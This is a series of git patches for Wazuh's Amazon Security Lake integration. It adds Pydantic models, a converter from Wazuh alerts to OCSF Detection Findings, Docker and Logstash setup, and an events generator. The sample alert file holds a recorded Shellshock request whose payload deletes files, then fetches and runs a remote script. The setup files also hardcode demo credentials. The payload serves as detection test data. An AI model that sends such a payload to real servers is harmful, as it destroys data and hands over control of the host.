] -} \ No newline at end of file diff --git a/integrations/amazon-security-lake/requirements.txt b/integrations/amazon-security-lake/requirements.txt index 8c7a1cbaae79b..8ebe50a4ef264 100644 --- a/integrations/amazon-security-lake/requirements.txt +++ b/integrations/amazon-security-lake/requirements.txt @@ -1,2 +1,3 @@ pyarrow>=10.0.1 -parquet-tools>=0.2.15 \ No newline at end of file +parquet-tools>=0.2.15 +pydantic==2.6.1 \ No newline at end of file diff --git a/integrations/amazon-security-lake/run.py b/integrations/amazon-security-lake/run.py new file mode 100644 index 0000000000000..d8234226bf98e --- /dev/null +++ b/integrations/amazon-security-lake/run.py @@ -0,0 +1,34 @@ +import transform +import json + + +def _test(): + ocsf_event = {} + with open("./wazuh-event.sample.json", "r") as fd: + # Load from file descriptor + raw_event = json.load(fd) + try: + event = 
transform.converter.from_json(raw_event) + print(event) + ocsf_event = transform.converter.to_detection_finding(event) + print("") + print("--") + print("") + print(ocsf_event) + # event = Event.model_validate_json(json.dumps(event)) + # print(event) + # ocsf_event = to_detection_finding(event) + + except KeyError as e: + raise (e) + # except ValidationError as e: + # print(e) + + # if ocsf_event: + # with open("wazuh-event.ocsf.json", "w") as fd: + # json.dump(ocsf_event.model_dump(), fd) + # print(ocsf_event.model_dump()) + + +if __name__ == '__main__': + _test() diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index eee82036c3ff5..ab399f58b7b9a 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -7,8 +7,9 @@ import time import json import datetime -from pyarrow import parquet, Table -from ocsf import converter +from pyarrow import parquet, Table, fs + +from transform import converter block_ending = { "block_ending": True } diff --git a/integrations/amazon-security-lake/transform/__init__.py b/integrations/amazon-security-lake/transform/__init__.py new file mode 100644 index 0000000000000..6e8733a32b85d --- /dev/null +++ b/integrations/amazon-security-lake/transform/__init__.py @@ -0,0 +1 @@ +import transform.converter diff --git a/integrations/amazon-security-lake/transform/converter.py b/integrations/amazon-security-lake/transform/converter.py new file mode 100644 index 0000000000000..983ba9572841f --- /dev/null +++ b/integrations/amazon-security-lake/transform/converter.py @@ -0,0 +1,112 @@ +import json + +import pydantic +import transform.models as models + + +def normalize(level: int) -> int: + """ + Normalizes rule level into the 0-6 range, required by OCSF. + """ + # TODO normalization + return level + + +def join(iterable, separator=","): + return (separator.join(iterable)) + + +def to_detection_finding(event: models.wazuh.Event) -> models.ocsf.DetectionFinding: + finding_info = models.ocsf.FindingInfo( + analytic=models.ocsf.AnalyticInfo( + category=", ".join(event.rule.groups), + name=event.decoder.name, + type_id=1, + uid=event.rule.id + ), + attacks=models.ocsf.AttackInfo( + tactic=models.ocsf.TechniqueInfo( + name=", ".join(event.rule.mitre.tactic), + uid=", ".join(event.rule.mitre.id) + ), + technique=models.ocsf.TechniqueInfo( + name=", ".join(event.rule.mitre.technique), + uid=", ".join(event.rule.mitre.id) + ), + version="v13.1" + ), + title=event.rule.description, + types=[event.input.type], + uid=event.id + ) + + metadata = models.ocsf.Metadata( + log_name="Security events", + log_provider="Wazuh", + product=models.ocsf.ProductInfo( + name="Wazuh", + lang="en", + vendor_name="Wazuh, Inc,." 
+ ), + version="1.1.0" + ) + + resources = [models.ocsf.Resource( + name=event.agent.name, uid=event.agent.id)] + + severity_id = normalize(event.rule.level) + + unmapped = { + "data_sources": [ + event.location, + event.manager.name + ], + "nist": event.rule.nist_800_53 # Array + } + + return models.ocsf.DetectionFinding( + count=event.rule.firedtimes, + message=event.rule.description, + finding_info=finding_info, + metadata=metadata, + raw_data=event.full_log, + resources=resources, + risk_score=event.rule.level, + severity_id=severity_id, + time=event.timestamp, + unmapped=unmapped + ) + + +def from_json(event: dict) -> models.wazuh.Event: + # Needs to a string, bytes or bytearray + try: + return models.wazuh.Event.model_validate_json(json.dumps(event)) + except pydantic.ValidationError as e: + print(e) + + +def _test(): + ocsf_event = {} + with open("wazuh-event.sample.json", "r") as fd: + # Load from file descriptor + event = json.load(fd) + try: + # Create instance of Event from JSON input (must be string, bytes or bytearray) + event = models.wazuh.Event.model_validate_json(json.dumps(event)) + print(event) + ocsf_event = to_detection_finding(event) + + except KeyError as e: + raise (e) + except pydantic.ValidationError as e: + print(e) + + if ocsf_event: + with open("wazuh-event.ocsf.json", "w") as fd: + json.dump(ocsf_event.model_dump(), fd) + print(ocsf_event.model_dump()) + + +if __name__ == '__main__': + _test() diff --git a/integrations/amazon-security-lake/transform/legacy/legacy_converter.py b/integrations/amazon-security-lake/transform/legacy/legacy_converter.py new file mode 100644 index 0000000000000..2a14b75957c97 --- /dev/null +++ b/integrations/amazon-security-lake/transform/legacy/legacy_converter.py @@ -0,0 +1,87 @@ +#!/usr/bin/python + +# event comes from Filebeat +event = {} + + +def normalize(level: int) -> int: + """ + Normalizes rule level into the 0-6 range, required by OCSF. + """ + # TODO normalization + return level + + +def join(iterable, separator=","): + return (separator.join(iterable)) + + +def convert(event: dict) -> dict: + """ + Converts Wazuh events to OCSF's Detecting Finding (2004) class. + """ + ocsf_class_template = \ + { + "activity_id": 1, + "category_name": "Findings", + "category_uid": 2, + "class_name": "Detection Finding", + "class_uid": 2004, + "count": event["rule"]["firedtimes"], + "message": event["rule"]["description"], + "finding_info": { + "analytic": { + "category": join(event["rule"]["groups"]), + "name": event["decoder"]["name"], + "type_id": 1, + "uid": event["rule"]["id"], + }, + "attacks": { + "tactic": { + "name": join(event["rule"]["mitre"]["tactic"]), + }, + "technique": { + "name": join(event["rule"]["mitre"]["technique"]), + "uid": join(event["rule"]["mitre"]["id"]), + }, + "version": "v13.1" + }, + "title": event["rule"]["description"], + "types": [ + event["input"]["type"] + ], + "uid": event['id'] + }, + "metadata": { + "log_name": "Security events", + "log_provider": "Wazuh", + "product": { + "name": "Wazuh", + "lang": "en", + "vendor_name": "Wazuh, Inc,." 
+ }, + "version": "1.1.0", + }, + "raw_data": event["full_log"], + "resources": [ + { + "name": event["agent"]["name"], + "uid": event["agent"]["id"] + }, + ], + "risk_score": event["rule"]["level"], + "severity_id": normalize(event["rule"]["level"]), + "status_id": 99, + "time": event["timestamp"], + "type_uid": 200401, + "unmapped": { + "data_sources": [ + event["_index"], + event["location"], + event["manager"]["name"] + ], + "nist": event["rule"]["nist_800_53"], # Array + } + } + + return ocsf_class_template diff --git a/integrations/amazon-security-lake/ocsf/test.py b/integrations/amazon-security-lake/transform/legacy/legacy_test.py similarity index 57% rename from integrations/amazon-security-lake/ocsf/test.py rename to integrations/amazon-security-lake/transform/legacy/legacy_test.py index e7d947848b067..ebcb8fa4b2e90 100644 --- a/integrations/amazon-security-lake/ocsf/test.py +++ b/integrations/amazon-security-lake/transform/legacy/legacy_test.py @@ -1,15 +1,15 @@ #!/usr/bin/python -from converter import convert +from transform.legacy.converter import convert import json converted_event = {} -with open("wazuh-event.sample.json", "r") as fd: +with open("../wazuh-event.sample.json", "r") as fd: sample_event = json.load(fd) # print(json.dumps(sample_event, indent=4)) converted_event = convert(sample_event) - + if converted_event: - with open("wazuh-event.ocsf.json", "w") as fd: + with open("../wazuh-event.ocsf.json", "w") as fd: json.dump(converted_event, fd) - print("Done") \ No newline at end of file + print("Done") diff --git a/integrations/amazon-security-lake/transform/models/__init__.py b/integrations/amazon-security-lake/transform/models/__init__.py new file mode 100644 index 0000000000000..2fdec7bc648af --- /dev/null +++ b/integrations/amazon-security-lake/transform/models/__init__.py @@ -0,0 +1,2 @@ +import transform.models.wazuh +import transform.models.ocsf diff --git a/integrations/amazon-security-lake/transform/models/ocsf.py b/integrations/amazon-security-lake/transform/models/ocsf.py new file mode 100644 index 0000000000000..4918b6e29081c --- /dev/null +++ b/integrations/amazon-security-lake/transform/models/ocsf.py @@ -0,0 +1,66 @@ +import pydantic +import typing + + +class AnalyticInfo(pydantic.BaseModel): + category: str + name: str + type_id: int + uid: str + + +class TechniqueInfo(pydantic.BaseModel): + name: str + uid: str + + +class AttackInfo(pydantic.BaseModel): + tactic: TechniqueInfo + technique: TechniqueInfo + version: str + + +class FindingInfo(pydantic.BaseModel): + analytic: AnalyticInfo + attacks: AttackInfo + title: str + types: typing.List[str] + uid: str + + +class ProductInfo(pydantic.BaseModel): + name: str + lang: str + vendor_name: str + + +class Metadata(pydantic.BaseModel): + log_name: str + log_provider: str + product: ProductInfo + version: str + + +class Resource(pydantic.BaseModel): + name: str + uid: str + + +class DetectionFinding(pydantic.BaseModel): + activity_id: int = 1 + category_name: str = "Findings" + category_uid: int = 2 + class_name: str = "Detection Finding" + class_uid: int = 2004 + count: int + message: str + finding_info: FindingInfo + metadata: Metadata + raw_data: str + resources: typing.List[Resource] + risk_score: int + severity_id: int + status_id: int = 99 + time: str + type_uid: int = 200401 + unmapped: typing.Dict[str, typing.List[str]] = pydantic.Field() diff --git a/integrations/amazon-security-lake/transform/models/wazuh.py b/integrations/amazon-security-lake/transform/models/wazuh.py new file mode 100644 index 
0000000000000..34aa3c91e96e1 --- /dev/null +++ b/integrations/amazon-security-lake/transform/models/wazuh.py @@ -0,0 +1,50 @@ +import pydantic +import typing + +# =========== Wazuh event models =========== # +# These are only the fields required for the integration. + + +class Mitre(pydantic.BaseModel): + technique: typing.List[str] = [] + id: typing.List[str] = "" + tactic: typing.List[str] = [] + + +class Rule(pydantic.BaseModel): + firedtimes: int = 0 + description: str = "" + groups: typing.List[str] = [] + id: str = "" + mitre: Mitre = Mitre() + level: int = 0 + nist_800_53: typing.List[str] = [] + + +class Decoder(pydantic.BaseModel): + name: str + + +class Input(pydantic.BaseModel): + type: str + + +class Agent(pydantic.BaseModel): + name: str + id: str + + +class Manager(pydantic.BaseModel): + name: str + + +class Event(pydantic.BaseModel): + rule: Rule = {} + decoder: Decoder = {} + input: Input = {} + id: str = "" + full_log: str = "" + agent: Agent = {} + timestamp: str = "" + location: str = "" + manager: Manager = {} diff --git a/integrations/amazon-security-lake/wazuh-event.sample.json b/integrations/amazon-security-lake/wazuh-event.sample.json new file mode 100644 index 0000000000000..d7e0558b62c62 --- /dev/null +++ b/integrations/amazon-security-lake/wazuh-event.sample.json @@ -0,0 +1,76 @@ +{ + "input": { + "type": "log" + }, + "agent": { + "name": "redacted.com", + "id": "000" + }, + "manager": { + "name": "redacted.com" + }, + "data": { + "protocol": "GET", + "srcip": "000.111.222.10", + "id": "404", + "url": "/cgi-bin/jarrewrite.sh" + }, + "rule": { + "firedtimes": 1, + "mail": false, + "level": 6, + "pci_dss": [ + "11.4" + ], + "tsc": [ + "CC6.1", + "CC6.8", + "CC7.2", + "CC7.3" + ], + "description": "Shellshock attack attempt", + "groups": [ + "web", + "accesslog", + "attack" + ], + "mitre": { + "technique": [ + "Exploitation for Privilege Escalation", + "Exploit Public-Facing Application" + ], + "id": [ + "T1068", + "T1190" + ], + "tactic": [ + "Privilege Escalation", + "Initial Access" + ] + }, + "id": "31166", + "nist_800_53": [ + "SI.4" + ], + "info": "CVE-2014-6271https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271", + "gdpr": [ + "IV_35.7.d" + ] + }, + "location": "/var/log/nginx/access.log", + "decoder": { + "name": "web-accesslog" + }, + "id": "1707402914.872885", + "GeoLocation": { + "city_name": "Amsterdam", + "country_name": "Netherlands", + "region_name": "North Holland", + "location": { + "lon": 4.9087, + "lat": 52.3534 + } + }, + "full_log": "000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] \"GET /cgi-bin/jarrewrite.sh HTTP/1.1\" 404 162 \"-\" \"() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'\"", + "timestamp": "2024-02-08T11:35:14.334-0300" +} \ No newline at end of file From 05ae2d15a92777e885cc3890ebf94ac2bab65b1f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Thu, 22 Feb 2024 15:49:49 +0100 Subject: [PATCH 25/34] Create minimal Docker environment to test and develop the integration. 
--- integrations/.gitignore | 5 + integrations/README.md | 32 ++++ .../amazon-security-lake/.dockerignore | 180 ++++++++++++++++++ integrations/amazon-security-lake/Dockerfile | 41 ++++ integrations/amazon-security-lake/README.md | 15 +- .../logstash/pipeline/indexer-to-file.conf | 26 +++ ...output.conf => indexer-to-integrator.conf} | 0 .../{wazuh-s3.conf => indexer-to-s3.conf} | 0 .../amazon-security-lake/logstash/setup.sh | 11 +- integrations/amazon-security-lake/run.py | 2 + .../stdin_to_securitylake.py | 2 +- .../amazon-security-lake.yml} | 29 ++- .../tools/events-generator/.dockerignore | 2 + .../tools/events-generator/Dockerfile | 4 + integrations/tools/events-generator/README.md | 11 ++ integrations/tools/events-generator/run.py | 13 +- 16 files changed, 349 insertions(+), 24 deletions(-) create mode 100644 integrations/.gitignore create mode 100644 integrations/README.md create mode 100644 integrations/amazon-security-lake/.dockerignore create mode 100644 integrations/amazon-security-lake/Dockerfile create mode 100644 integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf rename integrations/amazon-security-lake/logstash/pipeline/{pipe-output.conf => indexer-to-integrator.conf} (100%) rename integrations/amazon-security-lake/logstash/pipeline/{wazuh-s3.conf => indexer-to-s3.conf} (100%) rename integrations/{amazon-security-lake/docker-compose.yml => docker/amazon-security-lake.yml} (69%) create mode 100644 integrations/tools/events-generator/.dockerignore create mode 100644 integrations/tools/events-generator/Dockerfile diff --git a/integrations/.gitignore b/integrations/.gitignore new file mode 100644 index 0000000000000..8f10b6459740c --- /dev/null +++ b/integrations/.gitignore @@ -0,0 +1,5 @@ +elastic +opensearch +splunk +common +config \ No newline at end of file diff --git a/integrations/README.md b/integrations/README.md new file mode 100644 index 0000000000000..5e69b4f673d6c --- /dev/null +++ b/integrations/README.md @@ -0,0 +1,32 @@ +## Wazuh indexer integrations + +This folder contains integrations with third-party XDR, SIEM and cybersecurity software. +The goal is to transport Wazuh's analysis to the platform that suits your needs. + +### Amazon Security Lake + +TBD + +##### Usage + +A demo of the integration can be started using the content of this folder and Docker. + +```console +docker compose -f ./docker/amazon-security-lake.yml up -d +``` + +This docker compose project will bring a *wazuh-indexer* node, a *wazuh-dashboard* node, +a *logstash* node and our event generator. On the one hand, the event generator will push events +constantly to the indexer. On the other hand, logstash will constantly query for new data and +deliver it to the integration Python program, also present in that node. Finally, the integration +module will prepare and send the data to the Amazon Security Lake's S3 bucket. + + +For production usage, follow the instructions in our documentation page about this matter. +(_when-its-done_) + +As a last note, we would like to point out that we also use this Docker environment for development. 
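+
+While developing, you can also run the integration script against a local output
+folder instead of the demo's S3 bucket and inspect the resulting Parquet files
+with `pyarrow`, which is already listed in `requirements.txt`. The file name
+below is only an example; actual names depend on the output folder and on the
+timestamp generated by the script.
+
+```console
+python3 -c "from pyarrow import parquet; print(parquet.read_table('wazuh-2024-02-22_12.00.00.parquet').to_pydict())"
+```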
+ +### Other integrations + +TBD diff --git a/integrations/amazon-security-lake/.dockerignore b/integrations/amazon-security-lake/.dockerignore new file mode 100644 index 0000000000000..891ff7a135014 --- /dev/null +++ b/integrations/amazon-security-lake/.dockerignore @@ -0,0 +1,180 @@ +wazuh-event.ocsf.json +*.parquet +Dockerfile + +# Created by https://www.toptal.com/developers/gitignore/api/python +# Edit at https://www.toptal.com/developers/gitignore?templates=python + +### Python ### +# Byte-compiled / optimized / DLL files +__pycache__/ +*.py[cod] +*$py.class + +# C extensions +*.so + +# Distribution / packaging +.Python +build/ +develop-eggs/ +dist/ +downloads/ +eggs/ +.eggs/ +lib/ +lib64/ +parts/ +sdist/ +var/ +wheels/ +share/python-wheels/ +*.egg-info/ +.installed.cfg +*.egg +MANIFEST + +# PyInstaller +# Usually these files are written by a python script from a template +# before PyInstaller builds the exe, so as to inject date/other infos into it. +*.manifest +*.spec + +# Installer logs +pip-log.txt +pip-delete-this-directory.txt + +# Unit test / coverage reports +htmlcov/ +.tox/ +.nox/ +.coverage +.coverage.* +.cache +nosetests.xml +coverage.xml +*.cover +*.py,cover +.hypothesis/ +.pytest_cache/ +cover/ + +# Translations +*.mo +*.pot + +# Django stuff: +*.log +local_settings.py +db.sqlite3 +db.sqlite3-journal + +# Flask stuff: +instance/ +.webassets-cache + +# Scrapy stuff: +.scrapy + +# Sphinx documentation +docs/_build/ + +# PyBuilder +.pybuilder/ +target/ + +# Jupyter Notebook +.ipynb_checkpoints + +# IPython +profile_default/ +ipython_config.py + +# pyenv +# For a library or package, you might want to ignore these files since the code is +# intended to run in multiple environments; otherwise, check them in: +# .python-version + +# pipenv +# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. +# However, in case of collaboration, if having platform-specific dependencies or dependencies +# having no cross-platform support, pipenv may install dependencies that don't work, or not +# install all needed dependencies. +#Pipfile.lock + +# poetry +# Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control. +# This is especially recommended for binary packages to ensure reproducibility, and is more +# commonly ignored for libraries. +# https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control +#poetry.lock + +# pdm +# Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control. +#pdm.lock +# pdm stores project-wide configurations in .pdm.toml, but it is recommended to not include it +# in version control. +# https://pdm.fming.dev/#use-with-ide +.pdm.toml + +# PEP 582; used by e.g. 
github.com/David-OConnor/pyflow and github.com/pdm-project/pdm +__pypackages__/ + +# Celery stuff +celerybeat-schedule +celerybeat.pid + +# SageMath parsed files +*.sage.py + +# Environments +.env +.venv +env/ +venv/ +ENV/ +env.bak/ +venv.bak/ + +# Spyder project settings +.spyderproject +.spyproject + +# Rope project settings +.ropeproject + +# mkdocs documentation +/site + +# mypy +.mypy_cache/ +.dmypy.json +dmypy.json + +# Pyre type checker +.pyre/ + +# pytype static type analyzer +.pytype/ + +# Cython debug symbols +cython_debug/ + +# PyCharm +# JetBrains specific template is maintained in a separate JetBrains.gitignore that can +# be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore +# and can be added to the global gitignore or merged into this file. For a more nuclear +# option (not recommended) you can uncomment the following to ignore the entire idea folder. +#.idea/ + +### Python Patch ### +# Poetry local configuration file - https://python-poetry.org/docs/configuration/#local-configuration +poetry.toml + +# ruff +.ruff_cache/ + +# LSP config files +pyrightconfig.json + +# End of https://www.toptal.com/developers/gitignore/api/python \ No newline at end of file diff --git a/integrations/amazon-security-lake/Dockerfile b/integrations/amazon-security-lake/Dockerfile new file mode 100644 index 0000000000000..a2eec0f8d6075 --- /dev/null +++ b/integrations/amazon-security-lake/Dockerfile @@ -0,0 +1,41 @@ +# MULTI-STAGE build + +FROM python:3.9 as builder +# Create a virtualenv for dependencies. This isolates these packages from +# system-level packages. +RUN python3 -m venv /env +# Setting these environment variables are the same as running +# source /env/bin/activate. +ENV VIRTUAL_ENV /env +ENV PATH /env/bin:$PATH +# Copy the application's requirements.txt and run pip to install all +# dependencies into the virtualenv. +COPY requirements.txt /app/requirements.txt +RUN pip install -r /app/requirements.txt + + +FROM python:3.9 +ENV LOGSTASH_KEYSTORE_PASS="SecretPassword" +# Add the application source code. +COPY --chown=logstash:logstash . /home/app +# Add execution persmissions. +RUN chmod a+x /home/app/run.py +# Copy the application's dependencies. +COPY --from=builder /env /env + +# Install Logstash +RUN apt-get update && apt-get install -y iputils-ping wget gpg apt-transport-https +RUN wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | gpg --dearmor -o /usr/share/keyrings/elastic-keyring.gpg && \ + echo "deb [signed-by=/usr/share/keyrings/elastic-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | tee -a /etc/apt/sources.list.d/elastic-8.x.list && \ + apt-get update && apt install -y logstash +# Install logstash-input-opensearch plugin. +RUN /usr/share/logstash/bin/logstash-plugin install logstash-input-opensearch +# Copy the Logstash's ingestion pipelines. +COPY --chown=logstash:logstash logstash/pipeline /usr/share/logstash/pipeline +# Grant logstash ownership over its files +RUN chown --recursive logstash:logstash /usr/share/logstash /etc/logstash /var/log/logstash /var/lib/logstash + +USER logstash +# Copy and run the setup.sh script to create and configure a keystore for Logstash. 
+COPY --chown=logstash:logstash logstash/setup.sh /usr/share/logstash/bin/setup.sh +RUN bash /usr/share/logstash/bin/setup.sh \ No newline at end of file diff --git a/integrations/amazon-security-lake/README.md b/integrations/amazon-security-lake/README.md index 46eee1b92a4b0..1dbe1dd4ebb23 100644 --- a/integrations/amazon-security-lake/README.md +++ b/integrations/amazon-security-lake/README.md @@ -46,4 +46,17 @@ sudo -E /usr/share/logstash/bin/logstash -f /etc/logstash/conf.d/wazuh-s3.conf - # Start Logstash sudo systemctl enable logstash sudo systemctl start logstash -``` \ No newline at end of file +``` + + +### Building the Docker image + +```console +docker build -t wazuh/indexer-security-lake-integration:latest . --progress=plain +``` + + +Run with: +```console +docker run -it --name=wazuh-indexer-security-lake-integration --rm wazuh/indexer-security-lake-integration ls +``` diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf new file mode 100644 index 0000000000000..e3fa60a785372 --- /dev/null +++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf @@ -0,0 +1,26 @@ +input { + opensearch { + hosts => ["opensearch-node:9200"] + user => "${INDEXER_USERNAME}" + password => "${INDEXER_PASSWORD}" + ssl => false + index => "wazuh-alerts-4.x-*" + query => '{ + "query": { + "range": { + "@timestamp": { + "gt": "now-1m" + } + } + } + }' + target => "_source" + schedule => "* * * * *" + } +} + +output { + file { + path => "/usr/share/logstash/pipeline/indexer-to-file.json" + } +} diff --git a/integrations/amazon-security-lake/logstash/pipeline/pipe-output.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf similarity index 100% rename from integrations/amazon-security-lake/logstash/pipeline/pipe-output.conf rename to integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf diff --git a/integrations/amazon-security-lake/logstash/pipeline/wazuh-s3.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf similarity index 100% rename from integrations/amazon-security-lake/logstash/pipeline/wazuh-s3.conf rename to integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf diff --git a/integrations/amazon-security-lake/logstash/setup.sh b/integrations/amazon-security-lake/logstash/setup.sh index 2b1fc109f401a..9527f1fa58362 100644 --- a/integrations/amazon-security-lake/logstash/setup.sh +++ b/integrations/amazon-security-lake/logstash/setup.sh @@ -4,12 +4,7 @@ # indexer's credentials. NOTE: works only for dockerized logstash. 
# Source: https://www.elastic.co/guide/en/logstash/current/keystore.html -# Prepare keystore -set +o history -export LOGSTASH_KEYSTORE_PASS="SecretPassword" -set -o history - # Create keystore -/usr/share/logstash/bin/logstash-keystore create -echo "admin" | /usr/share/logstash/bin/logstash-keystore add INDEXER_USERNAME -echo "admin" | /usr/share/logstash/bin/logstash-keystore add INDEXER_PASSWORD +/usr/share/logstash/bin/logstash-keystore create --path.settings /etc/logstash +echo "admin" | /usr/share/logstash/bin/logstash-keystore add INDEXER_USERNAME --path.settings /etc/logstash +echo "admin" | /usr/share/logstash/bin/logstash-keystore add INDEXER_PASSWORD --path.settings /etc/logstash diff --git a/integrations/amazon-security-lake/run.py b/integrations/amazon-security-lake/run.py index d8234226bf98e..515d1d97610f9 100644 --- a/integrations/amazon-security-lake/run.py +++ b/integrations/amazon-security-lake/run.py @@ -1,3 +1,5 @@ +#!/env/bin/python3.9 + import transform import json diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index ab399f58b7b9a..4aa650b158c54 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -1,4 +1,4 @@ -#!/home/fede/src/wazuh-indexer/integrations/amazon-security-lake/venv/bin/python3 +#!/env/bin/python3.9 import os import sys diff --git a/integrations/amazon-security-lake/docker-compose.yml b/integrations/docker/amazon-security-lake.yml similarity index 69% rename from integrations/amazon-security-lake/docker-compose.yml rename to integrations/docker/amazon-security-lake.yml index 6c5c1c21445c9..67effe4deed55 100644 --- a/integrations/amazon-security-lake/docker-compose.yml +++ b/integrations/docker/amazon-security-lake.yml @@ -1,5 +1,18 @@ version: '3' +name: "amazon-security-lake" services: + events-generator: + image: wazuh/indexer-events-generator + build: + context: ../tools/events-generator + container_name: events-generator + depends_on: + - opensearch-node + networks: + - opensearch-net + # TODO add healthcheck to indexer's service to avoid sending requests before API is ready. + command: bash -c "sleep 10 && echo 'Ey, wake up!' && python run.py -a opensearch-node" + opensearch-node: image: opensearchproject/opensearch:latest # This should be the same image used for opensearch-node1 to avoid issues container_name: opensearch-node @@ -21,6 +34,7 @@ services: - opensearch-data:/usr/share/opensearch/data networks: - opensearch-net + opensearch-dashboards: image: opensearchproject/opensearch-dashboards:latest # Make sure the version of opensearch-dashboards matches the version of opensearch installed on other nodes container_name: opensearch-dashboards @@ -33,16 +47,9 @@ services: networks: - opensearch-net logstash: + image: wazuh/indexer-security-lake-integration build: - context: . 
- dockerfile_inline: | - FROM logstash:8.12.1 - - COPY --chown=logstash:logstash logstash/setup.sh /usr/share/logstash/bin/setup.sh - COPY --chown=logstash:logstash logstash/pipeline/pipe-output.conf /usr/share/logstash/pipeline/pipe-output.config - - RUN bash /usr/share/logstash/bin/setup.sh - RUN /usr/share/logstash/bin/logstash-plugin install logstash-input-opensearch + context: ../amazon-security-lake container_name: logstash environment: LOG_LEVEL: trace @@ -53,12 +60,14 @@ services: - "5000:5000/udp" - "5044:5044" - "9600:9600" + volumes: + - ../amazon-security-lake/logstash/pipeline:/usr/share/logstash/pipeline depends_on: - opensearch-node networks: - opensearch-net command: tail -f /dev/null - # command: logstash -f /usr/share/logstash/pipeline/pipe-output.config + # command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.config --path.settings /etc/logstash volumes: opensearch-data: diff --git a/integrations/tools/events-generator/.dockerignore b/integrations/tools/events-generator/.dockerignore new file mode 100644 index 0000000000000..0f028b576338e --- /dev/null +++ b/integrations/tools/events-generator/.dockerignore @@ -0,0 +1,2 @@ +.venv +Dockerfile \ No newline at end of file diff --git a/integrations/tools/events-generator/Dockerfile b/integrations/tools/events-generator/Dockerfile new file mode 100644 index 0000000000000..da32f8c042017 --- /dev/null +++ b/integrations/tools/events-generator/Dockerfile @@ -0,0 +1,4 @@ +FROM python:3.9 +COPY . /home/events-generator/ +WORKDIR /home/events-generator +RUN pip install -r requirements.txt \ No newline at end of file diff --git a/integrations/tools/events-generator/README.md b/integrations/tools/events-generator/README.md index b11988192929e..ed8e53ea8acd9 100644 --- a/integrations/tools/events-generator/README.md +++ b/integrations/tools/events-generator/README.md @@ -41,3 +41,14 @@ INFO:event_generator:Event created INFO:event_generator:Event created {'_index': 'wazuh-alerts-4.x-2024.02.13-000001', '_id': 'eRWno40BZRXLJU5t4u66', '_version': 1, 'result': 'created', '_shards': {'total': 2, 'successful': 2, 'failed': 0}, '_seq_no': 172, '_primary_term': 1} ``` + +### Building the Docker image + +```console +docker build -t wazuh/indexer-events-generator:latest . +``` + +Run with: +```console +docker run -it --name=wazuh-indexer-events-generator --rm wazuh/indexer-events-generator python run.py -h +``` \ No newline at end of file diff --git a/integrations/tools/events-generator/run.py b/integrations/tools/events-generator/run.py index 3a6a4aeba9fc0..9b56f6969c505 100644 --- a/integrations/tools/events-generator/run.py +++ b/integrations/tools/events-generator/run.py @@ -1,4 +1,4 @@ -#!/usr/bin/pyton +#!/usr/bin/python3 # Events generator tool for Wazuh's indices. # Chooses a random element from /alerts.json to index @@ -136,6 +136,11 @@ def parse_args(): parser = argparse.ArgumentParser( description="Events generator tool for Wazuh's indices. Indexes a random element from /alerts.json", ) + parser.add_argument( + '-i', '--index', + default="wazuh-alerts-4.x-sample", + help="Destination index name or alias" + ) parser.add_argument( '-o', '--output', choices=['indexer', 'filebeat'], @@ -143,9 +148,9 @@ def parse_args(): help="Destination of the events. Default: indexer." 
) parser.add_argument( - '-i', '--index', + '-m', '--module', default="wazuh-alerts", - help="Index name or module (e.g: wazuh-alerts, wazuh-states-vulnerabilities)" + help="Wazuh module to read the alerts from (e.g: wazuh-alerts, wazuh-states-vulnerabilities). Must match a subfolder's name." ) # Infinite loop by default parser.add_argument( @@ -189,7 +194,7 @@ def parse_args(): def main(args: dict): - inventory = Inventory(f"{args['index']}/alerts.json") + inventory = Inventory(f"{args['module']}/alerts.json") logger.info("Inventory created") publisher = PublisherCreator.create(args["output"], args) logger.info("Publisher created") From 17f47caec1e9db250585e01878ae4a0a62657f43 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Thu, 22 Feb 2024 15:58:02 +0100 Subject: [PATCH 26/34] Fix events-generator's Inventory starvation --- integrations/tools/events-generator/run.py | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/integrations/tools/events-generator/run.py b/integrations/tools/events-generator/run.py index 9b56f6969c505..ec4ded0010c76 100644 --- a/integrations/tools/events-generator/run.py +++ b/integrations/tools/events-generator/run.py @@ -42,9 +42,11 @@ def __init__(self, path: str): self.size = len(self.elements) def get_random(self) -> str: + """ + Returns the last element of the list + """ random.shuffle(self.elements) - return self.elements.pop() - # return self.elements[random.randint(0, self.size)] + return self.elements[self.size-1] # ================================================== # From 204948fdad9f77095e625a8278e06c212b26f2f0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Thu, 22 Feb 2024 16:08:30 +0100 Subject: [PATCH 27/34] Remove files present in #147 --- .../stdin_to_securitylake.py | 91 -------------- .../transform/legacy/legacy_converter.py | 87 ------------- 